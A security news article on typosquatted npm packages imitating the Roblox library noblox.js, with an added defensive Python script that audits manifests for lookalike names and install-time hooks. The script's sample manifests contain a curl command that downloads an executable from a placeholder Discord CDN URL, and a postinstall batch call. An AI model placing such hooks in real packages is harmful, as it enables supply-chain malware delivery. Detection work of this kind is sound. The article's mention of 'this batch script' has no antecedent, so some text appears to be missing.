Malicious NPM Libraries Caught Installing Password Thief and Ransomware
Malicious actors have once again published two more typosquatted libraries to the official NPM repository that mimic a legitimate package from Roblox, the game company, for the purpose of stealing credentials, installing remote access Trojans, and infecting compromised systems with ransomware.
The bogus packages – named “noblox.js-proxy” and “noblox.js-proxies” – have been found to mimic a library called “noblox.js”, a Roblox game API wrapper available on NPM that boasts close to 20,000 weekly downloads. The two poisoned libraries were downloaded a total of 281 and 106 times respectively.
This batch script, in turn, downloads malicious executables from Discord’s content delivery network (CDN) that are responsible for disabling anti-malware engines, persisting on the host, siphoning browser credentials from the host, and even deploying binaries with ransomware capabilities.
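The two warning signs described above, a typosquat-style package name derived from a popular library and an install-time lifecycle script that fetches a payload from Discord’s CDN, can be checked mechanically before a dependency is allowed into a build. The following audit is an added example, not code from the article or from any of the packages it names; the manifests it scans are constructed, the allow-list of known package names is assumed to be maintained by the defender, and the CDN URL is a placeholder.

```python
"""Audit npm package manifests for typosquat names and install-time hooks."""

# Assumption: a defender-maintained allow-list of popular package names.
KNOWN_PACKAGES = {"noblox.js"}
# Hosts seen in install scripts that warrant a closer look (Discord's CDN here).
SUSPICIOUS_HOSTS = ("cdn.discordapp.com",)
# npm runs these hooks automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch one-character name variants."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_of(name: str, known=KNOWN_PACKAGES):
    """Return the known package `name` appears to imitate, else None.
    Flags the suffix trick ("noblox.js-proxy") and single-edit variants."""
    for base in known:
        if name == base:
            return None
        suffix = name[len(base):]
        if name.startswith(base) and suffix[:1] in "-_.":
            return base
        if edit_distance(name, base) <= 1:
            return base
    return None


def audit_manifest(manifest: dict) -> list:
    """Return a list of human-readable findings for one package.json dict."""
    findings = []
    name = manifest.get("name", "")
    base = typosquat_of(name)
    if base:
        findings.append(f"name {name!r} resembles known package {base!r}")
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            findings.append(f"install-time hook {hook!r}: {cmd}")
            if any(host in cmd for host in SUSPICIOUS_HOSTS):
                findings.append(f"{hook!r} fetches from a suspicious host")
    return findings


# Constructed sample manifests: one legitimate, two imitating it.
SAMPLE_MANIFESTS = [
    {"name": "noblox.js", "scripts": {"test": "mocha"}},
    {"name": "noblox.js-proxy", "scripts": {"postinstall": "cmd /c install.bat"}},
    {"name": "nobloxjs", "scripts": {"preinstall":
        "curl -o x.exe https://cdn.discordapp.com/attachments/PLACEHOLDER/x.exe"}},
]
```

Run `audit_manifest` over every `package.json` under `node_modules` (or over a lockfile's resolved names) in CI and fail the build on any finding, then review the flagged hooks by hand.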
Recent research from Check Point Research and Microsoft-owned RiskIQ has revealed how threat actors are increasingly abusing Discord’s CDN, a platform with 150 million users, to deliver 27 unique malware families, ranging from backdoors and password stealers to spyware and Trojans.
Although the two malicious NPM libraries have since been removed and are no longer available, the findings are another indication of how popular code registries such as NPM, PyPI, and RubyGems have become a lucrative frontier for carrying out a variety of attacks.